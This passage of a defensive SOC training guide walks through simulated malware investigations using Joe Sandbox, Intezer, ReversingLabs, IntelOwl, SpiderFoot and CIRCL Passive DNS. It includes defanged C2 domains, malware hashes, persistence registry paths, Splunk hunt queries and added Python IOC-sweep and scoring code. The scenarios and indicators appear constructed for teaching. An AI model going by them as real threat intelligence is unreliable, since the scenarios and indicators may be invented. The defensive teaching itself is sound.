of file behaviour, static features, anti-evasion techniques and code similarity. It supports
Windows, macOS, Linux, Android and document files.
Use Cases:
• Search for existing analysis reports of known malicious or suspicious file hashes.
• Investigate malware techniques such as API hooking, process injection and
persistence.
• Discover malware families and configuration data.
• Evaluate AV bypass techniques used in sophisticated threats.
Practical Application: A partner organisation shares a suspicious PE file’s hash. The
SOC analyst queries it on Joe Sandbox, where the sandbox report shows anti-analysis
checks, C2 traffic and DLL injection attempts. The file is confirmed to be associated
with IcedID malware.
Scenario Simulation: Advanced Malware Analysis Using Joe Sandbox
Context
Objective: Analyse a suspicious PE file hash provided by a third party to determine its
behaviour, malware family and evasion techniques
Tool: Joe Sandbox
Environment:
• PE file hash received from partner organisation
• Hash submitted to Joe Sandbox for static, dynamic and hybrid analysis
• Analyst reviews API behaviour, evasion and malware family detection
Step 1: Suspicious File Hash Received
Trigger:
A partner organisation reports possible compromise via email attachment. They provide
the SHA256 hash of the suspicious .exe file:
Hash:
17e38b8f149a7cf248812ddfc3f3d3e1f04d0147120f41c66b85731f77f6a3d2
Initial Indicators:
• File identified as Windows PE (Portable Executable)
• No signature or publisher data
• Hash not found in internal threat feed
Step 2: Hash Lookup on Joe Sandbox
Action:
1. Go to [Link]
2. Use the search bar to input the file hash
3. If analysis exists, view full report; otherwise, request new analysis using the hash
submission
4. Navigate to:
o Static analysis
o Hybrid code graph
o Behavioural analysis
o MITRE ATT&CK mapping
Results:
Section             | Details
Verdict             | Malicious (Highly Threatening)
Malware Family      | IcedID Trojan
MITRE ATT&CK        | T1055 (Process Injection), T1059 (Command Execution), T1027 (Obfuscation)
Key Behaviour       | C2 contact over HTTPS, Anti-VM, Injects into [Link]
Signature Matches   | API Hooking, Windows Defender Evasion, Macro Dropper
Network Behaviour   | POST to xmaildrop[.]me and beacon every 90s
File System Changes | Drops [Link], creates autorun entry
Evasion Techniques  | Sleep obfuscation, RDTSC timing, sandbox detection
Screenshot Evidence | Hidden PowerShell, modified registry settings
Step 3: Threat Correlation and IOC Extraction
IOC Summary:
Type Indicator
IP [Link]
Domain xmaildrop[.]me
Dropped File [Link]
Registry Path HKCU\Software\Microsoft\Windows\Run\WinStartup
Mutex IcedID_Mutex_123
Splunk Query to Detect Presence:
index=edr_logs OR index=network
| search file_name="[Link]" OR domain="[Link]" OR
registry_path="*WinStartup*"
Findings:
• One machine reported outbound HTTPS to xmaildrop[.]me
• Another machine has file hash match in Sysmon logs
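The Splunk hunt above, and the equivalent hunts in the Hybrid Analysis scenario before it and the Intezer scenario after it, all sweep endpoint telemetry for an IOC set. The following is an added example, not the page's code and not a Splunk or Sysmon feature: it runs such a sweep offline over constructed Sysmon-style events and handles the three things that make naive string matching miss hits. Indicators are refanged (xmaildrop[.]me becomes xmaildrop.me), domains match on subdomains, Sysmon's "SHA256=...,MD5=..." Hashes field is parsed rather than substring-matched, and per-user registry paths are normalised so the HKCU form in the IOC table matches the HKU\<SID> form Sysmon actually logs. The indicators are the IcedID IOC table above; the events and host names are constructed, and "MutexName" is an assumed EDR field since Sysmon has no mutex event.

```python
"""IOC sweep over endpoint telemetry (added example, not the page's or any vendor's code).

Offline equivalent of the Splunk hunt queries in the hash-lookup scenarios. Events and
host names are constructed; the indicators are the IcedID IOC table. "MutexName" is an
assumed EDR field, since Sysmon has no mutex event.
"""
import re
from typing import Callable, Dict, List

IOC_SET = {
    "domain": ["xmaildrop[.]me"],
    "registry_path": ["HKCU\\Software\\Microsoft\\Windows\\Run\\WinStartup"],
    "mutex": ["IcedID_Mutex_123"],
    "sha256": ["17e38b8f149a7cf248812ddfc3f3d3e1f04d0147120f41c66b85731f77f6a3d2"],
}

# Which telemetry fields can carry each indicator type (Sysmon names except MutexName).
FIELD_MAP = {
    "domain": ["QueryName", "DestinationHostname"],
    "registry_path": ["TargetObject"],
    "sha256": ["Hashes"],
    "mutex": ["MutexName"],
}

USER_HIVE_RE = re.compile(r"^hku\\s-1-5-[\d-]+\\(.*)$")   # Sysmon writes per-user keys as HKU\<SID>\...
HKCU_RE = re.compile(r"^hkcu\\(.*)$")


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".").replace("hxxps://", "https://").replace("hxxp://", "http://")


def normalise_registry(path: str) -> str:
    """Drop the hive so HKCU\\X and HKU\\<SID>\\X compare equal, case-insensitively."""
    p = path.lower().replace("hkey_current_user", "hkcu").replace("hkey_users", "hku")
    for pattern in (USER_HIVE_RE, HKCU_RE):
        m = pattern.match(p)
        if m:
            return m.group(1)
    return p


def match_domain(value: str, ioc: str) -> bool:
    v, i = value.lower().rstrip("."), ioc.lower()
    return v == i or v.endswith("." + i)


def match_hash(value: str, ioc: str) -> bool:
    """Sysmon's Hashes field is "SHA256=...,MD5=...": compare only the SHA256 component."""
    for part in value.split(","):
        algo, _, digest = part.partition("=")
        if algo.strip().lower() == "sha256" and digest.strip().lower() == ioc.lower():
            return True
    return False


def match_registry(value: str, ioc: str) -> bool:
    return normalise_registry(value) == normalise_registry(ioc)


def match_exact(value: str, ioc: str) -> bool:
    return value == ioc


MATCHERS: Dict[str, Callable[[str, str], bool]] = {
    "domain": match_domain, "sha256": match_hash, "registry_path": match_registry, "mutex": match_exact,
}


def sweep(events: List[Dict[str, object]], ioc_set: Dict[str, List[str]] = IOC_SET) -> List[Dict[str, object]]:
    hits = []
    for event in events:
        for ioc_type, indicators in ioc_set.items():
            for field in FIELD_MAP[ioc_type]:
                value = event.get(field)
                if value is None:
                    continue
                for ioc in indicators:
                    if MATCHERS[ioc_type](str(value), refang(ioc)):
                        hits.append({"host": event["host"], "event_id": event["EventID"],
                                     "ioc_type": ioc_type, "indicator": refang(ioc), "field": field})
    return hits


def affected_hosts(events: List[Dict[str, object]]) -> List[str]:
    return sorted({str(hit["host"]) for hit in sweep(events)})


# Constructed Sysmon-style events: DNS query (22), process create (1), registry value set (13).
SAMPLE_EVENTS = [
    {"host": "WKS-DEV-2023", "EventID": 22, "QueryName": "cdn.xmaildrop.me"},
    {"host": "WKS-MGMT-002", "EventID": 1, "Image": "C:\\Users\\Public\\update.exe",
     "Hashes": "SHA256=17E38B8F149A7CF248812DDFC3F3D3E1F04D0147120F41C66B85731F77F6A3D2,MD5=00000000000000000000000000000000"},
    {"host": "WKS-MGMT-002", "EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\Run\\WinStartup"},
    {"host": "WKS-HR-011", "EventID": 22, "QueryName": "mail.example.com"},
    {"host": "WKS-HR-011", "EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "Hashes": "SHA256=0000000000000000000000000000000000000000000000000000000000000000,MD5=00000000000000000000000000000000"},
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_EVENTS):
        print(hit)
    print("affected hosts:", affected_hosts(SAMPLE_EVENTS))
```

The registry normalisation is the step most often missing from ad-hoc hunts: a literal search for "HKCU\...\WinStartup" returns nothing from Sysmon data because the event carries the user's SID under HKU instead.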
Step 4: Response Plan
Host Status Action Taken
WKS-DEV-2023 IOC match (domain) Isolated, memory forensics initiated
WKS-MGMT-002 Dropped file found Quarantine and threat eradication
All endpoints IOC sweep completed No further hits
EDR Actions:
• IOC blocklist pushed
• YARA rules created for [Link] and known IcedID artifacts
• Email threat shared with other SOCs via ISAC feed
Step 5: Documentation and SOC Enrichment
Wiki Entry:
Field Details
Tool Used Joe Sandbox
Verdict Malicious
Malware Family IcedID
IOC Summary Domain, hash, mutex, registry path
Behaviour Summary Process injection, C2 communication, stealth evasion
ATT&CK Techniques T1055, T1059, T1027
SOC Playbook Updated:
• Joe Sandbox added to hash triage workflow
• Include sandbox verdict in risk scoring algorithm
• Internal hunt queries prepared based on this analysis
INTEZER
Intezer focuses on code similarity and genetic malware analysis. It compares file hashes
against a large corpus of known malware code to detect code reuse and identify malware
families based on functional similarity.
Use Cases:
• Perform genetic code analysis of binaries using hash lookups.
• Detect whether a file shares code with known malware families, even if not
detected by AV.
• Identify reuse of code across malware variants, APT toolkits and commodity
malware.
• Support threat attribution by linking samples to previously analysed campaigns.
Practical Application: An EDR tool flags an unknown binary. The SOC analyst checks
its hash in Intezer and finds it shares 80% of its codebase with TrickBot. This code
similarity provides attribution confidence and allows the team to hunt for other
related indicators.
Scenario Simulation: Code Reuse Detection and Attribution Using Intezer
Context
Objective: Validate and attribute a suspicious binary flagged by an EDR agent using genetic
code analysis from Intezer
Tool: Intezer Analyze
Environment:
• Suspicious PE file detected by EDR
• Hash extracted and checked in Intezer
• Analysis used for malware family detection, code reuse and campaign correlation
Step 1: Suspicious Binary Detected
Trigger:
EDR flags unknown binary client_service.exe running from %AppData%\Roaming\svc\. No
signature, unknown hash in VT, not seen in enterprise before.
Hash:
1d6e3dcd16bde8b9fcf43d1932b68d2d7ccfa8975a5a4dfd2ff2c8b7a30cf377
Initial Observation:
• Parent process: [Link]
• Network behaviour: HTTP POST to suspicious .ru domain
• Memory injection detected (target: [Link])
Step 2: Hash Lookup in Intezer
Action:
1. Navigate to [Link]
2. Input the SHA256 hash into the search field
3. Wait for scan result or initiate new analysis
4. Examine the returned genetic analysis and classification report
Results:
Section Output
Verdict Malicious
Malware Family TrickBot
Code Reuse Score 81% match to TrickBot (2022 variant)
Genome Mapping Shared components: loader, credential stealer, infostealer
MITRE Mapping T1055, T1082, T1003, T1566
Behavioural Traits Credential dumping, persistence, browser injection
Associated Campaign Tracked back to spam run seen in Eastern Europe
Step 3: Threat Attribution and IOC Pivoting
IOC Extraction from Intezer Report:
Type           | Indicator
Malware Family | TrickBot
Registry Key   | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ClientService
Dropped File   | [Link]
External URL   | hxxp://serv-cdn[.]ru/api
Parent Hashes  | Other variants seen in March-April 2025
Splunk Query for Threat Hunt:
index=edr_logs OR index=sysmon
| search file_name="client_service.exe" OR domain="[Link]" OR
registry_path="*ClientService*"
Outcome:
• Two additional machines had matching mutex and outbound traffic
• All endpoints using this binary were isolated
• Detection rule created using Intezer IOC tags
Step 4: Response and SOC Actions
Immediate Response:
Host Status Action
FIN-APPS-001 Infected Quarantined, memory dump collected
HR-ADMIN-004 Beacon detected Disconnected, forensic imaging
SOC Improvements:
• Intezer integration proposed in triage pipeline
• Attribution added to weekly threat report
• IOC pushed to SIEM and EDR blocklists
Step 5: Documentation and Process Enhancement
Knowledgebase Entry:
Field Description
Tool Used Intezer
Binary Hash 1d6e3dcd16bde8b9fcf43d1932b68d2d...
Family Attributed TrickBot (2022 Variant)
MITRE ATT&CK Mappings T1055, T1082, T1003, T1566
IOC Summary URL, file path, registry entry, mutex
Detection Strategy Behavioural + genetic similarity
Playbook Update:
• Hash lookup via Intezer for all unknown binaries flagged by EDR
• Add playbook decision point: >70% code reuse → Treat as known malware family
• Genetic correlation scores added as part of risk scoring
REVERSINGLABS
ReversingLabs is a threat intelligence and file reputation platform offering in-depth file
hash lookups with rich metadata, classification and static analysis. It focuses on detecting
malware at scale and is used in enterprise and SOC environments.
Use Cases:
• Search for file reputation data using hash values.
• Access classification tags, threat scores and file provenance.
• Integrate with SOAR and sandbox platforms for real-time hash enrichment.
• Detect polymorphic or obfuscated variants of known malware.
Practical Application: A file flagged during vulnerability scanning is hashed and
checked on ReversingLabs. The result shows it is a variant of a known infostealer, with
polymorphic behaviour designed to evade signature detection. This leads to
immediate blocklisting and threat hunting.
Scenario Simulation: Polymorphic Malware Detection and Enrichment Using ReversingLabs
Context
Objective: Validate file reputation and detect polymorphic malware variants during
vulnerability assessment using ReversingLabs
Tool: ReversingLabs TitaniumCloud
Environment:
• Endpoint vulnerability scan triggered file upload
• Hash enrichment via ReversingLabs
• SIEM: Splunk, with enrichment data injected via SOAR
Step 1: Suspicious File Flagged During Assessment
Trigger:
A routine Nessus vulnerability scan flags a suspicious .dll in the temp directory of a
development server (DEV-SERVER-001). The DLL is not signed and was recently dropped
by an installer package used by a third-party vendor.
File Path:
C:\Users\DevApp\AppData\Local\Temp\svc_host.dll
SHA256 Hash:
3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3
Initial triage indicates:
• Unknown hash (not in internal hash whitelist)
• No match in VirusTotal or Hybrid Analysis
• Suspicious strings include references to CredentialCache and Chrome\Login Data
Step 2: Hash Lookup in ReversingLabs
Action:
1. Navigate to ReversingLabs Lookup
2. Input the file's SHA256 hash
3. Review classification tags, threat score and static analysis
4. Cross-check family identification and indicators
Findings:
Field Value
Threat Classification Malicious (Threat Score: 94)
Malware Family Raccoon Stealer (polymorphic variant)
Tags Infostealer, Polymorphic, Credential Access
File Type PE32 DLL (DLL file)
Obfuscation Techniques Junk code, encrypted strings, anti-disassembly
Code Similarity 76% match with known 2023 Raccoon Stealer variant
MITRE Mappings T1003, T1056, T1059
Static Observables Extracted:
• Embedded string: Login [Link]
• Registry access to Software\Microsoft\Windows\CurrentVersion\Run
• API usage: CryptUnprotectData, GetUserNameA
Step 3: Integration into SOC Workflow
SOAR Enrichment Task:
ReversingLabs API used to enrich all hashes detected by vulnerability scans:
POST [Link]
{
"hash": "3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3"
}
Automated Output:
Attribute Result
Risk Level High
Family Raccoon Stealer
IOC Tag Credential Theft
Suggested Action Quarantine + Hunt
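The Automated Output table is what a SOAR enrichment task has to produce from several sources at once. The following is an added example, not the page's code and not ReversingLabs', Intezer's or Joe Sandbox's API: it combines a reputation threat score (as in this scenario), a genetic code-reuse percentage (Intezer's ">70% code reuse, treat as known malware family" decision point) and a sandbox verdict (the Joe Sandbox playbook's "include sandbox verdict in risk scoring") into the Risk Level and Suggested Action pair above, and sends hashes no source knows to the sandbox instead of scoring them. Every threshold other than the 70% rule is this example's assumption; the sample enrichments are constructed from the figures the scenarios state.

```python
"""SOAR file-reputation scoring (added example, not the page's or any vendor's code).

Combines a reputation threat score, a code-reuse percentage and a sandbox verdict into
the Risk Level / Suggested Action pair. All thresholds other than the page's 70% code-reuse
rule are this example's assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Enrichment:
    sha256: str
    reputation_score: Optional[int] = None     # 0-100 threat score from a file-reputation service
    reputation_family: Optional[str] = None
    code_reuse_pct: Optional[float] = None     # genetic similarity to a known family
    code_reuse_family: Optional[str] = None
    sandbox_verdict: Optional[str] = None      # "malicious" | "suspicious" | "clean"
    on_allowlist: bool = False

    def has_any_source(self) -> bool:
        return any(v is not None for v in (self.reputation_score, self.code_reuse_pct, self.sandbox_verdict))


def composite_score(e: Enrichment) -> Optional[int]:
    """Worst-source-wins score in 0..100, or None when no source has an opinion."""
    if e.on_allowlist:
        return 0
    if not e.has_any_source():
        return None
    score = 0
    if e.reputation_score is not None:
        score = max(score, e.reputation_score)
    if e.code_reuse_pct is not None:
        if e.code_reuse_pct > 70:          # page's decision point: treat as the known family
            score = max(score, 85)
        elif e.code_reuse_pct > 40:
            score = max(score, 50)
    if e.sandbox_verdict == "malicious":
        score = max(score, 90)
    elif e.sandbox_verdict == "suspicious":
        score = max(score, 60)
    return min(score, 100)


def attributed_family(e: Enrichment) -> Optional[str]:
    """Reputation naming wins; genetic similarity attributes only above the 70% line."""
    if e.reputation_family:
        return e.reputation_family
    if e.code_reuse_pct is not None and e.code_reuse_pct > 70:
        return e.code_reuse_family
    return None


def assess(e: Enrichment) -> Dict[str, object]:
    score = composite_score(e)
    if score is None:
        level, action = "Unknown", "Flag for sandbox submission"
    elif e.on_allowlist:
        level, action = "Allowlisted", "None"
    elif score >= 80:
        level, action = "High", "Quarantine + Hunt"
    elif score >= 50:
        level, action = "Medium", "Isolate host pending analyst review"
    else:
        level, action = "Low", "Monitor"
    return {"sha256": e.sha256, "score": score, "risk_level": level,
            "family": attributed_family(e), "suggested_action": action}


# Constructed enrichments using the figures from the ReversingLabs and Intezer scenarios.
SAMPLES = [
    Enrichment("3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3",
               reputation_score=94, reputation_family="Raccoon Stealer", code_reuse_pct=76,
               code_reuse_family="Raccoon Stealer"),
    Enrichment("1d6e3dcd16bde8b9fcf43d1932b68d2d7ccfa8975a5a4dfd2ff2c8b7a30cf377",
               code_reuse_pct=81, code_reuse_family="TrickBot"),
    Enrichment("0000000000000000000000000000000000000000000000000000000000000001"),   # nothing known yet
    Enrichment("0000000000000000000000000000000000000000000000000000000000000002",
               reputation_score=12, code_reuse_pct=20, sandbox_verdict="clean"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(assess(sample))
```

"Unknown" is kept distinct from "Low" on purpose: a hash nobody has seen is not evidence of a clean file, which is why the action for it is sandbox submission rather than monitoring.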
Splunk Hunt Query Example:
index=edr_logs OR index=sysmon
| search file_hash="3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3"
  OR file_name="svc_host.dll"
  OR command_line="*Login Data*"
Step 4: Response and Containment
Host Status Action Taken
DEV-SERVER-001 Infected Process terminated, file quarantined, full scan initiated
DEV-SERVER-002 At Risk Registry key detected, further analysis
All Workstations Monitored IOC distributed for endpoint-wide detection
EDR Signatures Updated:
• Hash blocklisted
• Registry and file path detection rules added
• Raccoon Stealer family rule pushed via SOAR
Step 5: Documentation and Mapping
Knowledgebase Entry:
Field Description
Tool Used ReversingLabs
Hash Investigated 3a1cdd09b1e65b2d83e9e5a2c1150c1db...
Malware Family Raccoon Stealer (Polymorphic Variant)
Threat Classification Malicious (Score: 94)
IOC Summary Hash, file name, registry path, strings
MITRE Techniques T1003 (Credential Dumping), T1056, T1059
Detection Strategy Static + SOAR enrichment
Playbook Update:
• Added ReversingLabs lookup step to post-vulnerability triage
• Tagging of polymorphic detections with priority score
• Created detection logic for obfuscated DLLs with registry persistence
9. API AGGREGATORS AND OSINT AUTOMATION PLATFORMS
INTELOWL
IntelOwl is an open-source threat intelligence orchestration platform designed to query
multiple OSINT services through a single API. It supports enrichment of observables such
as IPs, domains, hashes and URLs using both free and commercial sources.
Use Cases:
• Automatically enrich IOCs from incident alerts with contextual threat intelligence.
• Query multiple services (e.g., VirusTotal, AbuseIPDB, [Link], Shodan) from a
single interface.
• Integrate with SOAR or custom playbooks for threat triage automation.
• Aggregate passive DNS, malware relationships, reputation and threat scoring.
Practical Application: A SIEM alert produces multiple IOCs. Instead of manually
querying each source, the analyst uses IntelOwl to fetch all relevant data (AV
detections, passive DNS, URL behaviour, etc.) in one place. This saves time and
improves triage accuracy.
Scenario Simulation: IOC Triage Automation Using IntelOwl
Context
Objective: Automate enrichment of multiple IOCs generated from a suspicious outbound
traffic alert using IntelOwl to speed up triage and improve investigation depth.
Tool: IntelOwl
Environment:
• SIEM: Splunk and Suricata logs
• IOCs: 1 suspicious IP, 2 domains, 1 hash, 1 URL
• Integration: IntelOwl deployed locally and integrated via API with SOAR
Step 1: SIEM Alert Generates Multiple IOCs
Trigger:
An outbound connection alert is triggered from a workstation (FIN-USER-04) to an
unknown IP address over TCP port 443. The analyst extracts IOCs from Suricata alert logs:
IOC Type Value
IP [Link]
Domain update-checker[.]cc
Domain hxxp://maliciousfiles[.]net
Hash a61e911ef2d96309709b72e09a2d4537f8370f6c530f5cc0f0b6c8cf38a0f678
URL [Link]
Step 2: IOC Submission to IntelOwl
Action:
1. Access local instance of IntelOwl
2. Create a new request group and submit all IOCs in one batch
3. Select relevant analyzers (VirusTotal, AbuseIPDB, [Link], Shodan,
ThreatCrowd, CIRCL, etc.)
4. Initiate enrichment
Configuration:
• sources: VirusTotal, URLScan, CIRCL, Shodan
• analysers_enabled: passive_dns, ip_reputation, url_behavior, malware_analysis,
hash_reputation
Command via API (example using cURL):
curl -X POST [Link] \
-H 'Authorization: Bearer <API_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{"type": "ip", "data": "[Link]", "analyzers": ["AbuseIPDB", "Shodan", "OTX"]}'
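Before a batch of IOCs goes to an enrichment platform the raw values need refanging and typing; the Step 1 table lists "hxxp://maliciousfiles[.]net" as a domain, but with its scheme it is a URL, and an analyzer that expects a domain will reject it. The following is an added example, not the page's code and not IntelOwl's client: it classifies each pasted indicator as ip, domain, url or hash, refangs it, drops duplicates and builds one request body per observable in the type/data/analyzers shape of the curl call above. That body shape follows the page's example; the field names accepted by a deployed IntelOwl version should be confirmed against its API documentation. The IP and URL values are constructed because the page redacts them; the analyzer choices per type are assumptions drawn from the page's analyzer list.

```python
"""Observable classification and batch submission (added example, not the page's or IntelOwl's code).

The request body mirrors the shape of the page's curl example; confirm field names against
the deployed platform's API docs. IP and URL sample values are constructed.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

HASH_RE = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.I)   # MD5 / SHA1 / SHA256
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)

DEFAULT_ANALYZERS = {            # assumed analyzer choices per type, taken from the page's list
    "ip": ["AbuseIPDB", "Shodan", "OTX"],
    "domain": ["VirusTotal", "OTX", "CIRCL"],
    "url": ["VirusTotal", "URLScan"],
    "hash": ["VirusTotal", "OTX"],
}


def refang(value: str) -> str:
    """Undo the usual defanging so the platform receives a resolvable indicator."""
    return (value.strip().replace("[.]", ".").replace("(.)", ".")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def classify(raw: str) -> Tuple[str, str]:
    """Return (classification, normalised value). Order matters: hash, then IP, then URL, then domain."""
    value = refang(raw)
    if HASH_RE.match(value):
        return "hash", value.lower()
    try:
        ipaddress.ip_address(value)
        return "ip", value
    except ValueError:
        pass
    if "://" in value:
        return "url", value
    if DOMAIN_RE.match(value):
        return "domain", value.lower()
    raise ValueError(f"unrecognised observable: {raw!r}")


def build_batch(raw_iocs: List[str]) -> List[Dict[str, object]]:
    """One request body per unique observable, with analyzers chosen by type."""
    seen = set()
    batch = []
    for raw in raw_iocs:
        kind, value = classify(raw)
        if (kind, value) in seen:
            continue
        seen.add((kind, value))
        batch.append({"type": kind, "data": value, "analyzers": DEFAULT_ANALYZERS[kind]})
    return batch


# Raw IOCs as an analyst would paste them from the Step 1 table (IP and URL constructed).
RAW_IOCS = [
    "198.51.100.7",
    "update-checker[.]cc",
    "hxxp://maliciousfiles[.]net",
    "a61e911ef2d96309709b72e09a2d4537f8370f6c530f5cc0f0b6c8cf38a0f678",
    "hxxp://maliciousfiles[.]net/update",
    "update-checker[.]cc",     # duplicate, dropped by build_batch
]

if __name__ == "__main__":
    for body in build_batch(RAW_IOCS):
        print(body)
```

Classification order is deliberate: a SHA256 is tested before anything else because it can never be an IP or a domain, while an IP literal would otherwise satisfy a loose domain pattern.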
Step 3: IntelOwl Enrichment Results
Findings:
IOC           | Key Findings
[Link]        | Listed on AbuseIPDB for phishing, Shodan shows open HTTP server
update-[Link] | Associated with RedLine Stealer C2, passive DNS reveals multiple subdomains
[Link]        | Sandbox analysis flagged EXE downloads; domain registered 7 days ago
hash (SHA256) | Detected as RedLine variant by 56/70 AV engines, connects to above IPs
URL           | URLScan shows file download, redirects to secondary loader URL
Mapped Techniques:
• MITRE T1105 (Ingress Tool Transfer)
• MITRE T1071.001 (C2 over HTTP)
Step 4: Response and Playbook Automation
SOAR Automation Step:
• IntelOwl API integrated into SOAR playbook
• All IOCs passed for enrichment upon alert creation
• Enrichment results added to Splunk notable event timeline
• Triage analyst receives summarised report with reputation scores, AV hits and
behaviour patterns
Immediate Actions Taken:
IOC Action Taken
IP Blocked on perimeter firewall
Domain Sinkholed using DNS RPZ
Hash EDR rule created for detection
URL Proxy block enforced, logged in SIEM
Step 5: Documentation and Mapping
Wiki/Knowledgebase Entry Created:
Field Description
Tool Used IntelOwl
IOC Set 5 indicators (IP, domains, hash, URL)
Threat Family RedLine Stealer
Intel Sources Used VirusTotal, AbuseIPDB, URLScan, CIRCL, OTX
MITRE ATT&CK Mapping T1105, T1071.001
Result IOC triaged in <5 minutes, automated actions initiated
SOC Playbook Update:
• IntelOwl batch enrichment added to Phase 1 (IOC Triage)
• SOAR connector configured to trigger based on alert category (malware, beaconing)
• IOC scoring rules:
o High AV + Passive DNS = Critical
o Unknown hash = Flag for sandbox submission
SPIDERFOOT
SpiderFoot is an automation-focused reconnaissance and threat intelligence tool. It
collects data across hundreds of OSINT sources and correlates them to uncover
connections between IPs, domains, email addresses and infrastructure components.
Use Cases:
• Perform automated reconnaissance during threat investigations or red team
exercises.
• Discover relationships between threat actor infrastructure (shared IPs, domains,
WHOIS info).
• Use passive DNS, SSL cert analysis, reputation checks and breach data to expand
findings.
• Run scheduled scans for brand monitoring or threat surface discovery.
Practical Application: An analyst investigates a phishing campaign using a known
domain. SpiderFoot is used to identify connected infrastructure, shared hosting IPs,
similar WHOIS registrants and reused email addresses, exposing an entire phishing
kit network.
Scenario Simulation: Infrastructure Correlation Using SpiderFoot
Context
Objective: Investigate a phishing campaign domain to uncover related threat infrastructure
using SpiderFoot automation.
Tool: SpiderFoot
Environment:
• Target Domain: secure-login-mail[.]com (used in phishing email)
• SpiderFoot HX (local instance)
• SIEM: Suricata + Phishing Email Reporting Portal
• Analyst Workstation: Linux-based investigation VM
Step 1: Initial IOC Extraction
Trigger:
A user reports a suspicious email with a phishing link pointing to [Link]
mail[.]com/reset. The SOC team extracts the domain from the email header and body.
Pre-Check:
• Confirm domain is not internal
• Validate as suspicious via VirusTotal and reputation feeds
Step 2: SpiderFoot Scan Setup
Action:
1. Launch SpiderFoot GUI or CLI
2. Create a new scan task for domain: [Link]
3. Enable modules:
o Passive DNS
o WHOIS
o SSL Certs
o IP Reputation
o Email Leaks
o Affiliations and Metadata
CLI Example:
python3 [Link] -s [Link] -m passive_dns,whois,sslcert,cohosts,emailrep -o spiderfoot_report.html
Scan Duration: ~10–15 minutes depending on modules and API rate limits
Step 3: Intelligence Collection and Correlation
SpiderFoot Findings:
Type            | Data
IP Address      | [Link] (shared with 22 other phishing domains)
WHOIS Email     | admin@[Link] (linked to 12 malicious domains)
SSL Certificate | Self-signed, reused in 8 other C2 panels
Co-Hosted Sites | [Link], [Link]
Breach Email    | info@[Link] seen in 2023 breach (combo list)
Netblock        | Hosted in ASN registered to shady VPS provider in Eastern Europe
Passive DNS     | Shows rotation among several subdomains
Step 4: Threat Attribution and Infrastructure Mapping
Correlated Infrastructure:
Observable             | Link Established
admin@[Link]           | Connected to 12 domains, reused in WHOIS records
[Link]                 | Shared by 22 malicious domains
SSL Hash (SHA1)        | Matches C2 certificate used in RedLine campaigns
Passive DNS Subdomains | Match phishing kit patterns across multiple sites
Mapped Techniques:
• MITRE T1583.001 (Acquire Infrastructure: Domains)
• MITRE T1583.003 (Acquire Infrastructure: Virtual Private Server)
• MITRE T1585.001 (Establish Accounts: Social Media)
Step 5: Response Actions and Documentation
Action Taken:
Action                        | Description
IOC Blocklist Updated         | Domains and IP added to DNS RPZ and perimeter firewall
Threat Intel Platform Updated | WHOIS email, SSL hash, netblock tagged as malicious
Investigation Report Filed    | Attached SpiderFoot output and IOC enrichment
Playbook Triggered            | Alert escalated in SOAR workflow for phishing infrastructure
Step 6: Playbook and Intelligence Enrichment
Playbook Updates:
• SpiderFoot scanning added to phishing triage workflow
• Scheduled SpiderFoot scan added for critical brand assets (e.g., [Link])
SIEM Integration:
• Suricata configured to alert on co-hosted domain hits
• Phishing detection rules updated based on WHOIS + passive DNS relationships
CIRCL PASSIVE DNS
CIRCL Passive DNS is a service provided by the Computer Incident Response Center
Luxembourg that stores historical DNS resolutions. It allows analysts to view how domains
and IPs have changed over time.
Use Cases:
• Investigate the resolution history of malicious domains and discover past IP
associations.
• Identify other domains hosted on the same IP to detect malicious infrastructure
reuse.
• Correlate DNS changes with attack timelines.
• Understand domain lifecycle during incident response or forensic analysis.
Practical Application: A malicious domain resolves to a benign-looking IP. Using
CIRCL Passive DNS, the analyst sees the domain previously resolved to a C2 server
two weeks ago and was part of a known malware campaign. This context confirms it is
untrustworthy despite the recent change.
Scenario Simulation: Domain History Verification with CIRCL Passive DNS
Context
Objective: Verify whether a domain previously linked to malicious activity has changed its
IP address to evade detection and assess trustworthiness based on resolution history.
Tool: CIRCL Passive DNS
Environment:
• Alert Source: Email Gateway Alert
• IOC: accountupdate-mail[.]com
• Tool Access: Analyst uses CIRCL Passive DNS through API and web portal
Step 1: Alert and Domain Analysis
Trigger:
An internal user reports a phishing email disguised as a Microsoft account update. The link
in the email points to:
[Link]
Initial sandbox and URL scans show that the domain resolves to:
[Link]
No major AV detection or blocklist entry is found, making the domain appear clean.
Step 2: Passive DNS Lookup Using CIRCL
Action:
1. Analyst opens CIRCL Passive DNS platform.
2. Queries for historical resolution of the domain:
[Link]
Alternate API Call:
curl -H "Accept: application/json" [Link] [Link]
Output Example:
[
  {
    "rrname": "[Link]",
    "rrtype": "A",
    "rdata": "[Link]",
    "time_first": "2024-06-15",
    "time_last": "2024-06-21"
  },
  {
    "rrname": "[Link]",
    "rrtype": "A",
    "rdata": "[Link]",
    "time_first": "2024-07-03",
    "time_last": "present"
  }
]
Step 3: Historical IP Attribution
Findings:
Historical IP | Date Range       | Notes
[Link]        | 15–21 June 2024  | Previously reported in C2 communication logs from a RedLine Stealer campaign
[Link]        | From 3 July 2024 | No detection yet, hosted on shared VPS
Correlated Threat Intel:
• IP [Link] tagged in past MISP feeds with malware campaign indicators
• Domain moved IPs post-campaign (classic evasion technique)
